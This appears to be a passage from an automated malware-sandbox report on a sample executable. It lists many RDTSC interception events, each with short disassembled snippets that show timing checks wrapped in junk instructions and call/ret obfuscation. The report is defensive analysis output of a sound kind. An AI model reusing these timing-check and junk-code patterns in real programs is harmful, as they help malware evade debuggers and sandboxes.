              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11821EC second address: 11821F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11821F0 second address: 1182203 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F420070EDEFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1182203 second address: 118220C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1182375 second address: 118237B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 118237B second address: 1182386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F4200FD2916h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1182386 second address: 118239A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F420070EDE6h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 118239A second address: 11823BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4200FD2925h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F4200FD2916h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11823BD second address: 11823C9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F420070EDE6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11823C9 second address: 11823E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4200FD2923h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11823E1 second address: 11823EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 118522C second address: 1185233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1189989 second address: 118999E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F420070EDEBh 0x0000000a popad 0x0000000b push edi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 118999E second address: 11899B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4200FD2922h 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1150A37 second address: 1150A3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1150A3B second address: 1150A44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1150A44 second address: 1134DE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 ja 00007F420070EDE8h 0x0000000e push esi 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop esi 0x00000012 popad 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007F420070EDE8h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e jp 00007F420070EDECh 0x00000034 call dword ptr [ebp+12451DFCh] 0x0000003a push eax 0x0000003b push edx 0x0000003c jnl 00007F420070EDFDh 0x00000042 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1150AF9 second address: 1150AFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1150AFD second address: 1150B07 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F420070EDE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1150B07 second address: 1150B33 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4200FD2921h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4200FD2924h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1150E9E second address: 1150EA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F420070EDE6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1150FA6 second address: 1150FAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11511CC second address: 11511D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11511D0 second address: 11511DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11511DD second address: 1151200 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F420070EDE8h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f xchg eax, esi 0x00000010 cmc 0x00000011 nop 0x00000012 jmp 00007F420070EDEBh 0x00000017 push eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1151200 second address: 1151204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1151308 second address: 115130D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 115182F second address: 1151835 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1151835 second address: 115185D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F420070EDF1h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jg 00007F420070EDE6h 0x00000015 jnc 00007F420070EDE6h 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 115185D second address: 1151863 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1151863 second address: 11518AA instructions: 0x00000000 rdtsc 0x00000002 ja 00007F420070EDE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F420070EDE8h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 sub dword ptr [ebp+124755EAh], eax 0x0000002d stc 0x0000002e push 0000001Eh 0x00000030 mov ecx, dword ptr [ebp+122D373Ch] 0x00000036 nop 0x00000037 push ecx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11518AA second address: 11518AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1151CA7 second address: 1151CC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F420070EDF7h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1151CC2 second address: 113593D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4200FD2916h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F4200FD2925h 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007F4200FD2918h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d cld 0x0000002e call dword ptr [ebp+12459307h] 0x00000034 jnp 00007F4200FD2940h 0x0000003a push eax 0x0000003b push edx 0x0000003c jnc 00007F4200FD2916h 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 113593D second address: 1135941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1135941 second address: 1135982 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4200FD2916h 0x00000008 jmp 00007F4200FD2922h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push ecx 0x00000011 jmp 00007F4200FD2928h 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b jp 00007F4200FD2916h 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1135982 second address: 1135996 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F420070EDE6h 0x0000000e jbe 00007F420070EDE6h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1188DEF second address: 1188DF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1188DF3 second address: 1188DFD instructions: 0x00000000 rdtsc 0x00000002 jc 00007F420070EDE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1188DFD second address: 1188E02 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1188F77 second address: 1188F7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1188F7D second address: 1188F9C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4200FD2916h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F4200FD291Ch 0x0000000f push edi 0x00000010 je 00007F4200FD2916h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1189246 second address: 118924E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 118F0ED second address: 118F0F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 118F0F3 second address: 118F0F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 118F0F7 second address: 118F111 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4200FD291Ch 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 118F111 second address: 118F121 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F420070EDEEh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 118F121 second address: 118F125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 118E1C7 second address: 118E1CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 118E1CD second address: 118E1EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F4200FD2922h 0x0000000b pop ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 118E1EA second address: 118E1EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 118E1EE second address: 118E1F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 118E5C9 second address: 118E5E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F420070EDE8h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 118E5E3 second address: 118E5E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 118E5E7 second address: 118E5ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 118E5ED second address: 118E5F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 118E5F3 second address: 118E5FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F420070EDE6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 118DBDD second address: 118DBE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 118DBE6 second address: 118DC00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F420070EDF3h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 118DC00 second address: 118DC0A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4200FD291Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 118E890 second address: 118E8AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F420070EDF6h 0x0000000c pop ecx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 118E8AE second address: 118E8B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 118E8B3 second address: 118E8D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F420070EDF3h 0x0000000b popad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 118EE00 second address: 118EE55 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4200FD2916h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F4200FD2926h 0x00000014 jo 00007F4200FD2916h 0x0000001a jmp 00007F4200FD2925h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 push ecx 0x00000023 pop ecx 0x00000024 jmp 00007F4200FD2920h 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1193486 second address: 119348D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 119348D second address: 1193492 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1193A1E second address: 1193A25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1193E45 second address: 1193E50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4200FD2916h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1193E50 second address: 1193E6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F420070EDF7h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1193F99 second address: 1193FD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4200FD2925h 0x00000009 jmp 00007F4200FD2929h 0x0000000e popad 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1193FD3 second address: 1193FDD instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F420070EDE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1193FDD second address: 1193FE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 119480D second address: 1194812 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 119313B second address: 1193141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1193141 second address: 1193150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jne 00007F420070EDEEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1193150 second address: 119316C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edi 0x00000007 jmp 00007F4200FD291Eh 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 119BD14 second address: 119BD18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 119F0CB second address: 119F0CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 119F0CF second address: 119F0D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 119F0D3 second address: 119F0E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F4200FD291Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 119EC26 second address: 119EC2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 119EC2A second address: 119EC35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 119ED8A second address: 119EDAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F420070EDEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F420070EDF4h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 119EDAF second address: 119EDCC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4200FD2923h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11A3198 second address: 11A319E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11A3313 second address: 11A3324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11A3324 second address: 11A333A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F420070EDF1h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11A3469 second address: 11A3486 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4200FD2923h 0x00000007 jc 00007F4200FD2916h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11A3486 second address: 11A3496 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F420070EDE6h 0x0000000a jbe 00007F420070EDE6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11A3496 second address: 11A349A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
